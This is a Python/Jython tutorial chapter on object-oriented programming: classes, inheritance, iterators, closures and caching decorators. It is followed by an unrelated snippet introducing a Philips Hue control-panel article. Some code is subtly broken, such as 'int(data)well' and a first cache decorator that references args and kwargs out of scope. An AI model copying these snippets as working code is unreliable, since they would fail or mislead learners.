Let's start by creating a car class. The goal is to create an object that will manage it's own location on a two dimensional plane. We want to be able to tell it to turn, move forward, and we want to be able to interrogate the object to find out where it's current location is.
class Car(object): NORTH = 0 EAST = 1 SOUTH = 2 WEST = 3 def __init__(self, x=0, y=0): self.x = x self.y = y self.direction = 0 def turn_right(self): self.direction += 1 self.direction = self.direction % 4 def turn_left(self): self.direction -= 1 self.direction = self.direction % 4 def move(self, distance): if self.direction == self.NORTH: self.y += distance elif self.direction == self.SOUTH: self.y -= distance elif self.direction == self.EAST: self.x += distance else: self.x -= distance def position(self): return (self.x, self.y)
We'll go over that class definition in detail but right now, let's just see how to create a car, move it around and ask the car where it is.
from car import Car def test_car(): c = Car() c.turn_right() c.move(5) assert (5, 0) == c.position() c.turn_left() c.move(3) assert (5, 3) == c.position() if __name__ == '__main__': test_car()
The best way to think of a class is to think of it like a special kind of function that acts like a factory that generates object instances. For each call to the class - you are creating a new discrete copy of your object.
Once we've created the car instance, we can simply call functions that are attached to the car class and the object will manage it's own location. From the point of view of our test code - we do not need to manage the location of the car - nor do we need to manage the direction that the car is pointing in. We just tell it to move - and it does the right thing.
Let's go over the syntax in detail to see exactly what's going on here.
In Line 1, we declare that our Car object is a subclass of the root "object" class. Python, like many object oriented languages has a 'root' object that all other objects are based off of. This 'object' class defines basic behavior that all classes can reuse.
Python actually has two kinds of classes - 'newstyle' and old style. The old way of declaring classes didn't require you to type 'object' - you'll occassionally see the old-style class usage in some Python code, but it's not consider a good practice Just subclass 'object' for any of your base classes and your life will be simpler[1]_.
Lines 3 to 6 declare class attributes for the direction that any car can point to. These are class attributes so they can be shared across all object instances of the car object.
Now for the good stuff.
Line 8-11 declares the object initializer. In some languages, you might be familiar with a constructor - in Jython, we have an initializer which lets us pass values into an object at the time of creation.
In our initializer, we are setting the initial position of the car to (0, 0) on a 2 dimensional plane and then the direction of the car is initialized to pointing north. Fairly straight forward so far.
The function signature uses Python's default argument list feature so we don't have to explicitly set the initial location to (0,0), but there's a new argument introduced called 'self'. This is a reference to the current object.
Remember - your class definition is creating instances of objects. Once your object is created, it has it's own set of internal variables to manage. Your object will inevitably need to access these as well as any of the classes internal methods. Python will pass a reference to the current object as the first argument to all your instance methods.
If you're coming from some other object oriented language, you're probably familiar with the 'this' variable. Unlike C++ or Java, Python doesn't magically introduce the reference into the namespace of accessible variables, but this is consistent with Python's philosophy of making things explicit for clarity.
When we want to assign the initial x,y position, we just need to assign values on to the name 'x', and 'y' on the object. Binding the values of x and y to self makes the position values accessible to any code that has access to self - namely the other methods of the object. One minor detail here - in Python, you can technically name the arguments however you want. There's nothing stopping you from calling the first argument 'this' instead of 'self', but the community standard is to use 'self' [2].
Line 13 to 19 declare two methods to turn the vehicle in different directions. Notice how the direction is never directly manipulated by the caller of the Car object. We just asked the car to turn, and the car changed it's own internal 'direction' state.
Line 21 to 29 define where the car should move to when we move the car forward. The internal direction variable informs the car how it should manipulate the x and y position. Notice how the caller of the car object never needs to know precisely what direction the car is pointing in. The caller only needs to tell the object to turn and move forward. The particular details of how that message is used is abstracted away.
That's not too bad for a couple dozen lines of code.
This concept of hiding internal details is called encapsulation. This is a core concept in object oriented programming. As you can see from even this simple example - it allows you to structure your code so that you can provide a simplified interface to the users of your code.
Having a simplified interface means that we could have all kinds of behaviour happening behind the function calls to turn and move - but the caller can ignore all those details and concentrate on using the car instead of managing the car.
As long as the method signatures don't change, the caller really doesn't need to care about any of that. We can easily add persistence to this class - so we can save and load the car's state to disk.
First, pull in the pickle module - pickle will let us convert python objects into byte strings that can be restored to full objects later.
import pickle
Now, just add two new methods to load and save the state of the object.
def save(self): state = (self.direction, self.x, self.y) pickle.dump(state, open('mycar.pickle','wb')) def load(self): state = pickle.load(open('mycar.pickle','rb')) (self.direction, self.x, self.y) = state
Simply add calls to save() at the end of the turn and move methods, and the object will automatically save all the relevant internal values to disk.
People who use the car object don't even need to know that it's saving to disk, because the Car object handles it behind the scenes.
def turn_right(self): self.direction += 1 self.direction = self.direction % 4 self.save() def turn_left(self): self.direction -= 1 self.direction = self.direction % 4 self.save() def move(self, distance): if self.direction == self.NORTH: self.y += distance elif self.direction == self.SOUTH: self.y -= distance elif self.direction == self.EAST: self.x += distance else: self.x -= distance self.save()
Now, when you call the turn, or move methods, the car will automatically save itself to disk. If you want to reconstruct the car object's state from a previously saved pickle file, you can simply call the load() method.
Object Attribute Lookups
If you've beeen paying attention, you're probably wondering how the NORTH, SOUTH, EAST and WEST variables got bound to self. We never actually assigned them to the self variable during object initialization - so what's going on when we call move()? How is Jythpon actually resolving the value of those four variables?
Now seems like a good time to show how Jython resolves name lookups.
The direction names actually got bound to the Car class. The Jython object system does a little bit of magic when you try accessing any name against an object, it first searches for anything that was bound to 'self'. If python can't resolve any attribute on self with that name, it goes up the object graph to the class definition. The direction attributes NORTH, SOUTH, EAST, WEST were bound to the class definition - so the name resolution succeeds and we get the value of the class attribute.
An very short example will help clarify this
>>> class Foobar(object): ... def __init__(self): ... self.somevar = 42 ... class_attr = 99 ... >>> >>> obj = Foobar() >>> obj.somevar 42 >>> obj.class_attr 99 >>> obj.not_there Traceback (most recent call last): File "<stdin>", line 1, in <module> AttributeError: 'Foobar' object has no attribute 'not_there' >>>
So the key difference here is what you bind a value to. The values you bind to self are available only to a single object. Values you bind to the class definition are available to all instances of the class. The sharing of class attributes among all instances is a critical distinction because mutating a class attribute will affect all instances. This may cause unintended side effects if you're not paying attention as a variable may change value on you when you aren't expecting it to.
>>> other = Foobar() >>> other.somevar 42 >>> other.class_attr 99 >>> # obj and other will have different values for somevar >>> obj.somevar = 77 >>> obj.somevar 77 >>> other.somevar 42 >>> # Now show that we have the same copy of class_attr >>> other.class_attr = 66 >>> other.class_attr 66 >>> obj.class_attr 66
I think it's important to stress just how transparent Python's object system really is. Object attributes are just stored in a plain python dictionary. You can directly access this dictionary by looking at the __dict__ attribute.
>>> obj = Foobar() >>> obj.__dict__ {'somevar': 42}
Notice that there are no references to the methods of the class, or the class attribute. I'll reiterate it again - Python is going to just go up your inheritance graph - and go to the class definition to look for the methods of Foobar and the class attributes of foobar.
The same trick can be used to inspect all the attributes of the class, just look into the __dict__ attribute of the class definition and you'll find your class attributes and all the methods that are attached to your class definition
>>> Foobar.__dict__ {'__module__': '__main__', 'class_attr': 99, '__dict__': <attribute '__dict__' of 'Foobar' objects>, '__init__': <function __init__ at 1>}
This transparency can be leveraged with dynamic programming techniques using closures and binding new functions into your class definition at runtime. We'll revisit this later in the chapter when we look at generating function dynamically and finally with a short introduction to metaprogramming.
Inheritance and Overloading
In the car example, we subclass from the root object type. You can also subclass your own classes to specialize the behaviour of your objects. You may want to do this if you notice that your code naturally has a structure where you have many different classes that all share some common behaviour.
With objects, you can write one class, and then reuse it using inheritance to automatically gain access to the pre-existing behavior and attributes of the parent class. Your 'base' objects will inherit behaviour from the root 'object' class, but any subsequent subclasses will inherit from your own classes.
Let's take a simple example of using some animal classes to see how this works. Define a module "animals.py" with the following code:
- class Animal(object):
-
- def sound(self):
- return "I don't make any sounds"
- class Goat(Animal):
-
- def sound(self):
- return "Bleeattt!"
- class Rabbit(Animal):
-
- def jump(self):
- return "hippity hop hippity hop"
- class Jackalope(Goat, Rabbit):
- pass
Now you should be able to explore that module with the jython interpreter:
>>> from animals import * >>> animal = Animal() >>> goat = Goat() >>> rabbit = Rabbit() >>> jack = Jackalope()>>> animal.sound() "I don't make any sounds" >>> animal.jump() Traceback (most recent call last): File "<stdin>", line 1, in <module> AttributeError: 'Animal' object has no attribute 'jump'>>> rabbit.sound() "I don't make any sounds" >>> rabbit.jump() 'hippity hop hippity hop'>>> goat.sound() 'Bleeattt!' >>> goat.jump() Traceback (most recent call last): File "<stdin>", line 1, in <module> AttributeError: 'Goat' object has no attribute 'jump'>>> jack.jump() 'hippity hop hippity hop' >>> jack.sound() 'Bleeattt!'
Inheritance is a very simple concept, when you declare your class, you simply specify which parent classes you would like to reuse. Your new class can then automatically access all the methods and attributes of the super class. Notice how the goat couldn't jump and the rabbit couldn't make any sound, but the Jackalope had access to methods from both the rabbit and the goat.
With single inheritance - when your class simply inherits from one parent class - the rules for resolving where to find an attribute or a method are very straight forward. Jython just looks up to the parent if the current object doesn't have a matching attribute.
It's important to point out now that the Rabbit class is a type of Animal - the Python runtime can tell you that programmatically by using the isinstance function
>>> isinstance(bunny, Rabbit) True >>> isinstance(bunny, Animal) True >>> isinstance(bunny, Goat) False
For many classes, you may want to extend the behavior of the parent class instead of just completley overriding it. For this, you'll want to use the super(). Let's specialize the Rabbit class like this.
class EasterBunny(Rabbit): def sound(self): orig = super(EasterBunny, self).sound() return "%s - but I have eggs!" % orig
If you now try making this rabbit speak, it will extend the original sound() method from the base Rabbit class
>>> bunny = EasterBunny() >>> bunny.sound() "I don't make any sounds - but I have eggs!"
That wasn't so bad. For these examples, I only demonstrated that inherited methods can be invoked, but you can do exactly the same thing with attributes that are bound to the self.
For multiple inheritance, things get very tricky. In fact, the rules for resolving how attributes are looked up would easily fill an entire chapter (look up "The Python 2.3 Method Resolution Order" on Google if you don't believe me). There's not enough space in this chapter to properly cover the topic which should be a good indication to you that you really don't want to use multiple inheritance.
More advanced abstraction
Abstraction using plain classes is wonderful and all, but it's even better if your code seems to naturally fit into the syntax of the language. Python supports a variety of underscore methods - methods that start and end with double "_" signs that let you overload the behaviour of your objects. This means that your objects will seem to integrate more tightly with the language itself.
With the underscore methods, you can give you objects behaviour for logical and mathematical operations. You can even make your objects behave more like standard builtin types like lists, sets or dictionaries.
from __future__ import with_statement from contextlib import closing
- with closing(open('simplefile','w')) as fout:
- fout.writelines(["blah"])
- with closing(open('simplefile','r')) as fin:
- print fin.readlines()
The above snippet of code just opens a file, writes a little bit of text and then we just read the contents out. Not terriblly exciting. Most objects in Python are serializable to strings using the pickle module. We can leverage pickle to write out full blown objects to disk. Let's see the functional version of this:
from __future__ import with_statement from contextlib import closing from pickle import dumps, loads def write_object(fout, obj): data = dumps(obj) fout.write("%020d" % len(data)) fout.write(data) def read_object(fin): length = int(fin.read(20)) obj = loads(fin.read(length)) return obj class Simple(object): def __init__(self, value): self.value = value def __unicode__(self): return "Simple[%s]" % self.value with closing(open('simplefile','wb')) as fout: for i in range(10): obj = Simple(i) write_object(fout, obj) print "Loading objects from disk!" print '=' * 20 with closing(open('simplefile','rb')) as fin: for i in range(10): print read_object(fin)
This should output something like this:
Loading objects from disk! ==================== Simple[0] Simple[1] Simple[2] Simple[3] Simple[4] Simple[5] Simple[6] Simple[7] Simple[8] Simple[9]
So now we're doing something interesting. Let's look at exactly what happening here.
First, you'll notice that the Simple object is rendering a nice - the Simple object can render itself using the __unicode__ method. This is clearly an improvement over the earlier rendering of the object with angle brackets and a hex code.
The write_object function is fairly straight forward, we're just converting our objects into strings using the pickle module, computing the length of the string and then writing the length and the actual serialized object to disk.
This is fine, but the read side is a bit clunky. We don't really know when to stop reading. We can fix this using the iteration protocol. Which bring us to one of my favourite reasons to use objects at all in Python.
Protocols
In Python, we have 'duck typing'. If it sounds like a duck, quacks like a duck and looks like a duck - well - it's a duck. This is in stark contrast to more rigid languagse like C# or Java which have formal interface definitions. One of the nice benefits of having duck typing is that Python has the notion of object 'protocols'.
If you happen to implement the right methods - python will recognize your object as a certain type of 'thing'.
Iterators are objects that look like lists that let you read the next object. Implementing an iterator protocol is straight forward - just implement a next() method and a __iter__ method and you're ready to rock and roll. Let's see this in action:
class PickleStream(object): """ This stream can be used to stream objects off of a raw file stream """ def __init__(self, file): self.file = file def write(self, obj): data = dumps(obj) length = len(data) self.file.write("%020d" % length) self.file.write(data) def __iter__(self): return self def next(self): data = self.file.read(20) if len(data) == 0: raise StopIteration length = int(data)well return loads(self.file.read(length)) def close(self): self.file.close()
The above class will let you wrap a simple file object and you can now send it raw python objects to write to a file, or you can read objects out as if the stream was just a list of objects. Writing and reading becomes much simpler
with closing(PickleStream(open('simplefile','wb'))) as stream: for i in range(10): obj = Simple(i) stream.write(obj) with closing(PickleStream(open('simplefile','rb'))) as stream: for obj in stream: print obj
Abstracting out the details of serialization into the PickleStream lets us 'forget' about the details of how we are writing to disk. All we care about is that the object will do the right thing when we call the write() method.
The iteration protocol can be used for much more advanced uses, but even with this example, it should be obvious how useful it is. While you could implement the reading behaviour with a read() mo loethod, just using the stream as something you can loop over makes the code much easier to understand.
An aside a common problem that everyone seems to have
One particular snag that seems to catch every python programmer is when you use default values in a method signature.
>>> class Tricky(object): ... def mutate(self, x=[]): ... x.append(1) ... return x ... >>> obj = Tricky() >>> obj.mutate() [1] >>> obj.mutate() [1, 1] >>> obj.mutate() [1, 1, 1]
What's happening here is that the instance method 'mutate' is an object. The method object stores the default value for 'x' in an attribute inside the method object. So when you go and mutate the list, you're actually changing the value of an attribute of the method itself. Remember - this happens because when you invoke the mutate method, you're just accessing a callable attribute on the Tricky object.
Runtime binding of methods
One interesting feature in Python is that instance methods are actually just attributes hanging off of the class defintion - the functions are just attributes like any other variable, except that they happen to be 'callable'.
It's even possible to create and bind in functions to a class definition at runtime using the new module to create instance methods. In the following example, you can see that it's possible to define a class with nothing in it, and then bind methods to the class definition at runtime.
>>> def some_func(self, x, y): ... print "I'm in object: %s" % self ... return x * y ... >>> import new >>> class Foo(object): pass ... >>> f = Foo() >>> f <__main__.Foo object at 0x1> >>> Foo.mymethod = new.instancemethod(some_func, f, Foo) >>> f.mymethod(6,3) I'm in object: <__main__.Foo object at 0x1> 18
When you invoke the 'mymethod' method, the same attribute lookup machinery is being invoked. Python looks up the name against the 'self' object. When it can't find anything there, it goes to the class definition. When it finds it there, the instancemethod object is returned. The function is then caled with two arguments and you get to see the final result.
This kind of dynamism in Jython is extremely powerful. You can write code that generates functions at program runtime and then bind those functions to objects. You can do all of this because in Jython, classes are what are known as 'first class objects'. The class definition itself is an actual object - just like any other object. Manipulating classes is as easy as manipulating any other object.
Closures and Passing Objects
Python supports the notion of nested scopes - this can be used by to preserve some state information inside of another function. This technique isn't all that common outside of dynamic languages, so you may have never seen this before. Let's look at a simple example
def adder(x): def inner(y): return x + y return inner >>> func = adder(5) >>> func <function inner at 0x7adf0> >>> func(8) 13
This is pretty cool - we can actually create functions from templates of other functions. If you can think of a way to parameterize the behavior of a function, it becomes possible to create new functions dynamically. You can think of currying as yet another way of creating templates - this time you are creating a template for new functions.
This is a tremendously powerful tool once you gain some experience with it. Remember - everything in python is an object - even functions are first class objects in Python so you can pass those in as arguments as well. A practical use of this is to partially construct new functions from 'base' functions with some basic known behavior.
Let's take the previous adder closure and convert it to a more general form
def arith(math_func, x): def inner(y): return math_func(x, y) return inner def adder(x, y): return x + y >>> func = arith(adder, 91) >>> func(5) 96
This technique is called currying - you're now creating new function objects based on previous functions. The most common use for this is to create decorators. In Python, you can define special kinds of objects that wrap up your methods and add extra behavior. Some decorators are builtin already like 'property', 'classmethod' and 'staticmethod'. Once you have a decorator, you can sprinkle it on to of another function to add new behavior.
Decorator syntax looks something like this
@decorator_func_name(arg1, arg2, arg3, ...) def some_functions(x, y, z, ...): # Do something useful here pass
Suppose we have some method that requires intensive computational resoures to run, but the results do not vary much over time. Wouldn't it be nice if we could cache the results so that the computation wouldn't have to run each and every time?
Here's our class with a slow computation method
import time class Foobar(object): def slow_compute(self, *args, **kwargs): time.sleep(1) return args, kwargs, 42
Now let's cache the value using a decorator function. Our strategy is that for any function named X with some argument list, we want to create a unique name and save the final computed value to that name. We want our cached value to have a human readable name, we we want to reuse the original function name, as well as the arguments that were passed in the first time.
Let's get to some code!
import hashlib def cache(func): """ This decorator will add a _cache_functionName_HEXDIGEST attribute after the first invocation of an instance method to store cached values. """ # Obtain the function's name func_name = func.func_name # Compute a unique value for the unnamed and named arguments arghash = hashlib.sha1(str(args) + str(kwargs)).hexdigest() cache_name = '_cache_%s_%s' % (func_name, arghash) def inner(self, *args, **kwargs): if hasattr(self, cache_name): # If we have a cached value, just use it print "Fetching cached value from : %s" % cache_name return getattr(self, cache_name) result = func(self, *args, **kwargs) setattr(self, cache_name, result) return result return inner
There are only two new tricks that are in this code.
- I'm using the hashlib module to convert the arguments to the function into a unique single string.
- The use of getattr, hasattr and setattr to manipulate the cached value on the instance object.
Now, if we want to cache the slow method, we just throw on a @cache line above the method declaration.
@cache def slow_compute(self, *args, **kwargs): time.sleep(1) return args, kwargs, 42
Fantastic - we can reuse this cache decorator for any method we want now. Let's suppose now that we want our cache to invalidate itself after every 3 calls. This practical use of currying is only a slight modification to the original caching code.
import hashlib def cache(loop_iter): def function_closure(func): func_name = func.func_name def closure(self, loop_iter, *args, **kwargs): arghash = hashlib.sha1(str(args) + str(kwargs)).hexdigest() cache_name = '_cache_%s_%s' % (func_name, arghash) counter_name = '_counter_%s_%s' % (func_name, arghash) if hasattr(self, cache_name): # If we have a cached value, just use it print "Fetching cached value from : %s" % cache_name loop_iter -= 1 setattr(self, counter_name, loop_iter) result = getattr(self, cache_name) if loop_iter == 0: delattr(self, counter_name) delattr(self, cache_name) print "Cleared cached value" return result result = func(self, *args, **kwargs) setattr(self, cache_name, result) setattr(self, counter_name, loop_iter) return result return closure return function_closure
Now we're free to use @cache for any slow method and caching will come in for free - including automatic invalidation of the cached value. Just use it like this
@cache(10) def slow_compute(self, *args, **kwargs): # TODO: stuff goes here... pass
Review - and a taste of how we could fit all of this together
Now - I'm going to ask you to use your imagination a litte. We've covered quite a bit of ground really quickly.
We can :
- look up attributes in an object (use the __dict__ attribute).
- check if an object belongs to a particular class hierarchy (use the isinstance function).
- build functions out of other functions using currying.and even bind those functions to arbitrary names
This is fantastic - we now have all the basic building blocks we need to generate complex methods based on the attributes of our class. Imagine a simplified addressbook application with a simple contact.
class Contact(object): first_name = str last_name = str date_of_birth = datetime.Date
Assuming we know how to save and load to a database, we can use the function generation techniques to automatically generate load() and save() methods and bind them into our Contact class. We can use our introspection techniques to determine what attributes need to be saved to our database. We could even grow special methods onto our Contact class so that we could iterate over all of the class attributes and magically grow 'searchby_first_name' and 'searchby_last_name' methods.
See how powerful this can be? We can write extremly minimal code, and we could code generate all of our required specialized behavior for saving, loading and searching for records in a database. Since we do all of that programmatically - we can dramatically reduce the amount of code that we have to write by hand and by doing so - we can redue the chance that we introduce bugs into our system.
We're going to do exactly that in a later chapter. Build a simple database abstraction layer to demonstrate how to create your own object system that will automatically know how to read and write to a database.
|
https://bitbucket.org/javajuneau/jythonbook/src/28b0486ae6c1/chapter5.rst?at=tip
|
CC-MAIN-2015-14
|
refinedweb
| 5,036
| 63.7
|
cachetools 0.0.7
Collection of cache strategies
To use this package, put the following dependency into your project's dependencies section:
cachetools
This package contains some cache implementations (for example LRU cache) and underlying data structures.
Why you may want to use it? Because it is fast,
@safe. It is also
@nogc and
nothrow (inherited from your key/value types).
Limitations:
Cache implementations are not inherited from inerface or base class. This is because inheritance and attribute inference don't work together.
LRU cache
LRU cache keep limited number of items in memory. When adding new item to already full cache we have to evict some items. Eviction candidates are selected first from expired items (using per-cache configurable TTL) or from oldest accessed items.
Code examples
auto lru = new CacheLRU!(int, string); lru.size = 2048; // keep 2048 elements in cache lru.ttl = 60; // set 60 seconds TTL for items in cache lru.put(1, "one"); auto v = lru.get(1); assert(v == "one"); // 1 is in cache v = lru.get(2); assert(v.isNull); // no such item in cache
Default values for TTL is 0 which means - no TTL. Default value for size is 1024;
Class instance as key
To use class as key with this code, you have to define toHash and opEquals(important: opEquals to the class instance not Object) as safe or trusted (optionally as nogc if you need it):
import cachetools.hash: hash_function; class C { int s; this(int v) { s = v; } override hash_t toHash() const { return hash_function(s); } bool opEquals(const C other) pure const @safe { return s == other.s; } } CacheLRU!(immutable C, string) cache = new CacheLRU!(immutable C, string); immutable C s1 = new immutable C(1); cache.put(s1, "one"); auto s11 = cache.get(s1); assert(s11 == "one");
Cache events
Sometimes you have to know if items are purged from cache or modified. You can configure cache to report such events. Important warning - if you enable cache events and do not check it after cache operations, then list of stored events will grow without bounds. Code sample:
auto lru = new CacheLRU!(int, string); lru.enableCacheEvents(); lru.put(1, "one"); lru.put(1, "next one"); assert(lru.get(1) == "next one"); auto events = lru.cacheEvents(); writeln(events);
output:
[CacheEvent!(int, string)(Updated, 1, "one")]
Each
CacheEvent have
key and
val members and name of the event(Removed, Expired, Changed, Evicted).
Hash Table
Some parts of this package are based on internal hash table which can be used independently. It is open-addressing hash table with keys and values stored inline in the buckets array to avoid unnecessary allocations and better use of CPU cache for small key/value types.
Hash Table supports immutable keys and values. Due to language limitations you can't use structs with immutable/const members.
All hash table code is
@safe and require from user supplied functions such as
toHash or
opEquals also be safe (or trusted).
It is also
@nogc if
toHash and
opEquals are
@nogc.
opIndex is not
@nogc as it can throw exception.
Several code samples:
import cachetools.containers.hashmap; string[] words = ["hello", "my", "friend", "hello"]; void main() { HashMap!(string, int) counter; build0(counter); // build table (verbose variant) report(counter); counter.clear(); // clear table build1(counter); // build table (less verbose variant) report(counter); } /// verbose variant void build0(ref HashMap!(string, int) counter) @safe @nogc { foreach(word; words) { auto w = word in counter; if ( w !is null ) { (*w)++; // update } else { counter[word] = 1; // create } } } /// short variant void build1(ref HashMap!(string, int) counter) @safe @nogc { foreach(word; words) { auto w = word in counter; counter.getOrAdd(word, 0)++; } } void report(ref HashMap!(string, int) hashmap) @safe { import std.stdio; writefln("keys: %s", hashmap.byKey); writefln("values: %s", hashmap.byValue); writefln("pairs: %s", hashmap.byPair); writeln("---"); }
Output:
keys: ["hello", "friend", "my"] values: [2, 1, 1] pairs: [Tuple!(string, "key", int, "value")("hello", 2), Tuple!(string, "key", int, "value")("friend", 1), Tuple!(string, "key", int, "value")("my", 1)] --- keys: ["hello", "friend", "my"] values: [2, 1, 1] pairs: [Tuple!(string, "key", int, "value")("hello", 2), Tuple!(string, "key", int, "value")("friend", 1), Tuple!(string, "key", int, "value")("my", 1)] ---
- Registered by Igor Khasilev
- 0.0.7 released 4 days ago
- ikod/cachetools
- MIT
- Authors:
-
- Dependencies:
- none
- Versions:
- Show all 8 versions
- Download Stats:
48 downloads today
271 downloads this week
458 downloads this month
458 downloads total
- Score:
- 2.3
- Short URL:
- cachetools.dub.pm
|
https://code.dlang.org/packages/cachetools
|
CC-MAIN-2018-51
|
refinedweb
| 734
| 68.97
|
I’ve been wanting an excuse to learn how to code for OSX for a while now, and I finally thought of a project worth trying. In an effort to get up and running on XCode and Cocoa as quickly as possible, a number of people suggested I check out MacRuby. I have to say, I’m quite happy with it so far. I was able to find some simple tutorials to get me moving and started putting together some simple native OSX UIs pretty quickly, with UI elements that actually do things.
One of the goals of the app that I want to build is to show Growl notifications at various times, so I started digging into what this would take. I found a few tutorials, various forums and even a few bug tickets that generally gave me the information I needed, but I had to put it all together myself. So, in an effort to help the community a little more, I am going to try and post a complete tutorial on creating a MacRuby app with Growl notifications.
Getting Started – Xcode And The Growl Frameworks
First, you need a Mac and you need to install the latest and greatest Xcode. Start up Xcode and create a new MacRuby project. Give it a name and save it somewhere. Next, you’ll need the Growl frameworks. Xcode comes with several examples of how to work with Growl, but I found them all to be difficult and couldn’t get them working correctly. A few google searches later and I realized Growl delivers a nice framework package from their website.
Go download the Growl SDK from the Growl website. Open the disk image, and in the Frameworks folder, copy both the “Growl.framework” and “Growl-WithInstaller.framework”. Paste these into /Library/Frameworks on your OSX drive. This will make them easier to find from within Xcode.
Adding The Growl Framework To Your Project
Open Xcode and your project, and locate Frameworks in the project tree view. Pick one of the framework groups (I chose “Other” for no apparent reason), right click and “Add Existing Framework”. If you got copied the growl frameworks into the right folder, they will show up in the list. Otherwise you’ll have to hunt for them with the “Add Other” button.
Your projet now references Growl, but it won’t be able to find it at run time. We have to tell the project to copy the framework to the output folder so it can be found at runtime. Find the Targets node in the project treeview, and find your app’s name. Expand that portion of the tree and you will see several build phase. If you have an empty “Copy Files” step, great! If not, you need to right click your app name and “Add” a “New Build Phase” to “Copy Files”. If the Copy Files phase doesn’t open an “Info” screen, double click on it to open it. In this screen, set the “Destination” to “Frameworks” and leave the “Path” blank.
Close this window.
Now drag the Growl.framework from the “Frameworks/Other Frameworks” tree node, down into the “Copy Files” node that you just added. This will tell Xcode to copy the Growl.framework into your project’s output when it builds.
Configuration Growl To Know About Your App
You can’t just send things to Growl and expect it to magically work. You have to configure your app to use Growl and let Growl know what your app wants to do with it – what notifications you want to set up, what you want on by default, etc. There are several ways to configure your app to work with Growl. I chose to use a .growlRegDict file – a Growl Registration Dictionary. It’s an XML file that defines your app in a manner that Growl understands. You could use code to do the registration as well. There are a lot of examples for doing this online.
Start by adding a filed called “Growl Registration Ticket.growlRegDict” to your project. I chose to put this in my Resources folder. I’m not sure if the file must be named this, exactly, but I am fairly certain it has to have the .growlRegDict extension. Once you have the file in place, place the following XML in it:
<?xml version=”1.0″ encoding=”UTF-8″?>
<!DOCTYPE plist PUBLIC “-//Apple Computer//DTD PLIST 1.0//EN” “”>
<plist version=”1.0″>
<dict>
<key>TicketVersion</key>
<integer>1</integer>
<key>AllNotifications</key>
<array>
<string>Test</string>
</array>
<key>DefaultNotifications</key>
<array>
<string>Test</string>
</array>
</dict>
</plist>
I’ll let you read all of the documentation on the settings you can supply here. The basics of what you need to know, though, is the “AllNotifications” and “DefaultNotifications” list. Under all notifications, you must supply the names of every notification type your app will send. If you send anything that is not in this list, Growl will ignore it. Under default notifications, you need to tell Growl which of the notification types to enable, by default.
Next, drag the .growlRegDict file from Resources down into “Targets/(project)/Copy Bundle Resources”.
This will copy the resource so that the Growl Application Bridge will be able to find it at runtime.
Configuring Your App To Use Growl
From what I have read, a standard Xcode app will have various application delegates set up. I’m still not entirely sure how to describe these, other than they are classes that meet specific API needs and provide callback methods for various parts of your app. Perhaps the closest thing I can think of from my .NET days is the Event system, which does use delegates under the hood. However, there is a significant difference between a .NET delegate and an XCode/OSX delegate.
If you do not have an app delegate set up, you need to create one for two purposes:
- To register your app with Growl, at startup
- To use Growl callbacks for various events
Add a new ruby document to your project. I called it “ApplicationDelegate.rb” and placed it in the Classes folder of my project:
In this file, define a ruby class called ApplicationDelegate (though the name doesn’t matter that much at this point) and put the following code in it:
framework "Growl"class ApplicationDelegatedef awakeFromNib()GrowlApplicationBridge.setGrowlDelegate(self)endend
This code will tell Growl that your application is going to be sending notifications, once we have told the system that this class is an application delegate. To do that,open the Interface Builder by double clicking “MainMenu.xib” in the “Resources” folder of your project. Open the Library window by pressing “shift-cmd-L” (or however you want to get it open) and find an Object. Drag an Object over to your MainMenu.xib window, and drop it there. This adds an object that we can wire up to our UI.
Double click on the Object you just created to open the Info dialog. Set the “Class Identity” to your ApplicationController class.
Then hold down control on your keyboard and click-and-drag from “File’s Owner” down to the “Object” that you just added.
Let go of the mouse button and select “Delegate” from the resulting dialog. This will wire up your ApplicationDelegate so that the “awakeFromNib” method will fire when your app starts up, which will then register your app with Growl.
Make Your App Growl
Now for the fun part… we get to make the app Growl! At a very basic level, it’s easy. All you need to do is call the “GrowlApplicationBridge.notifyWithTitle” method. Somewhere in your app, you need to have some code that calls this method. To start with, you can put it directly into your awakeFromNib method in your Application Delegate class. This will fire off a Growl notification as soon as your app starts up.
def awakeFromNib()GrowlApplicationBridge.setGrowlDelegate(self: nil)end
You can read all the documentation on what these options do. For the most part, though, you need to pay attention to the first parameter and the “description” and “notificationName” in the hash.
The first parameter is the title of the notification. The remaining parameters are all technically a ruby hash using the succinct “key: value” syntax. The “description” is the large text body of the notification that is being sent. The “notificationName” is very important – it’s the name of the notification type that you are sending, and it must be one of the types that you set up in your “Growl Registration Ticket.growlRegDict” file. If you don’t use one that was set up in that file, Growl will ignore the notification.
Assuming my instructions are good, you should be able to run the app from Xcode and see a Growl notification!
That wasn’t too bad, was it?
And There’s So Much More
I’ve only just started learning MacRuby, XCode, Cocoa, Growl and all the things related to all of this. I know there’s so much more that I’ll be picking up on in the next few weeks while I’m trying to put together my little app. I’ll try to keep posting walk throughs like this, to help out those who would like to learn a little more.
As a preview of what else I’ve learned, though, you can set up a callback from a Growl notification so that when you click on the notification a chunk of code in your app will be executed. This opens up nearly limitless possibilities of what you can do with a Growl notification – launch a web page, launch another app, move your app into a specific feature, and more!
I’ll show you how to set up the click callback delegate in my next post.
Resources
Here are some of the resources I used when figuring this out
- – developer documentation with links to the SDK download
- – a complete MacRuby app, with Growl notifications. I learned a little more about the Growl registration dictionary and how to set up an Application Delegate by examining this project’s source code through Github, directly.
- – the basic tutorial that I followed, after learning about the Growl.framework that the Growl developers provide. This is written specifically for XCode and Objective-C, so I had to improvise and interpret a few things in order to do it in MacRuby.
- – discussion about a problem I ran into with the Growl-WithInstaller.framework. I ended up switching back to the plain Growl.framework for now. Hopefully I can get around the problem or find a solution to it, though. I would really like to deliver Growl with the app I’m building.
Get The Best JavaScript Secrets!
Get the trade secrets of JavaScript pros, and the insider info you need to advance your career!
Post Footer automatically generated by Add Post Footer Plugin for wordpress.
|
http://lostechies.com/derickbailey/2011/01/21/creating-growl-notifications-from-a-macruby-app/
|
CC-MAIN-2014-35
|
refinedweb
| 1,822
| 72.76
|
.png?w=72&h=72)
27 Aug 2019, 10:45
Philips Hue Intelligent lighting control panel demo in Python – using Riverdi IoT Displays powered by Zerynth
For the past few years, programming of embedded systems is not the exclusive job of assembler enthusiasts or low-level operations on the registers of the microcontroller. The dynamic development of the Internet of Things caused a significant part of high-level language programmers to transfer their professional interests from the area of high-performance PCs to small microprocessors and microcontrollers. This trend has not gone unnoticed by the hardware and software manufacturers, who provide developers with ready-made solutions that allow fast – and above all – high-level, preparation of a complete hardware and software project.
In this article, we will build a simple control system for Philips Hue series bulbs, using the intelligent Riverdi IoT Display module, the dedicated Zerynth programming environment, and the OKdo IoT Cloud– enabling easy and quick application development using Python. Now, let’s get started.
Table of Contents:
- About Riverdi IoT Display displays and the Philips Hue system
